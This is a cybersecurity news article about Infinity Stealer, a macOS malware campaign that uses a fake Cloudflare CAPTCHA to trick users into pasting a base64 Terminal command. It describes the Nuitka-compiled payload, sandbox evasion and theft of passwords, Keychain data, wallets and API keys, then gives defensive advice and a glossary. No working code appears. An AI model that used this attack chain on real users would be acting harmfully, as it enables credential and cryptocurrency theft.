Pythons in the Apple Orchard: How Infinity Stealer Slithers Past macOS Defenses

It starts with a familiar screen: a Cloudflare-style CAPTCHA, asking you to prove you’re human. But behind this seemingly routine check lies Infinity Stealer - a sophisticated new malware campaign targeting macOS users with a blend of psychological trickery and technical innovation. As macOS becomes a bigger target for cybercriminals, Infinity Stealer is raising the stakes, using open-source tools and clever social engineering to slip past even the most vigilant defenses.

Inside the Infinity Stealer Attack

The campaign begins with a deceptive landing page hosted on update-check[.]com, presenting a bogus Cloudflare “human verification” challenge. Victims are instructed to paste a base64-encoded command into their Terminal - a classic ClickFix tactic. This command silently downloads and executes a Bash script, which in turn drops a native macOS binary compiled with Nuitka, an open-source Python-to-C compiler. Unlike traditional Python malware, this approach produces a true native binary, stripping away the telltale signs that security tools typically look for.

The technical sophistication continues: the binary, weighing in at 8.6 MB, secretly unpacks a much larger compressed archive containing the main malware - Infinity Stealer. Before stealing anything, the malware checks whether it’s running in a sandbox or virtual machine, a common trick to evade detection during analysis.

Once active, Infinity Stealer goes to work: it takes screenshots, pilfers saved passwords and cookies from Chromium-based browsers and Firefox, extracts sensitive credentials from the macOS Keychain, seeks out cryptocurrency wallets, and scours developer files for plaintext secrets like API keys. All of this loot is exfiltrated via HTTP POST to a remote command-and-control server, and the operators receive a Telegram alert when the job is done.

Malwarebytes researchers, who first documented this campaign, warn that Infinity Stealer signals a new era of macOS threats - where attackers combine technical stealth with social engineering to devastating effect. The use of Nuitka makes the malware especially challenging to reverse-engineer, hampering efforts to develop quick defenses.

Staying Safe in the Age of Advanced Mac Malware

Infinity Stealer’s rise is a stark reminder that macOS users can no longer assume immunity from sophisticated cyber threats. The golden rule: never copy-paste Terminal commands from untrusted sources, no matter how convincing the website or pop-up may seem. As attackers refine their tactics, vigilance and skepticism remain the best defenses in the digital orchard.

WIKICROOK

• ClickFix: ClickFix is a scam where users are deceived into copying and pasting harmful code, often after a fake CAPTCHA, risking their accounts and data.
• Nuitka: Nuitka is a Python compiler that converts scripts into native binaries, often used by attackers to make malware analysis and detection more difficult.
• Base64: Base64 encodes binary data into ASCII text, enabling safe transmission of files or images over web applications and email systems.
• Command: A command is an instruction sent to a device or software, often by a C2 server, directing it to perform specific actions, sometimes for malicious purposes.
• macOS Keychain: macOS Keychain is Apple’s secure password manager, storing and encrypting user credentials and sensitive data on Mac computers for easy access.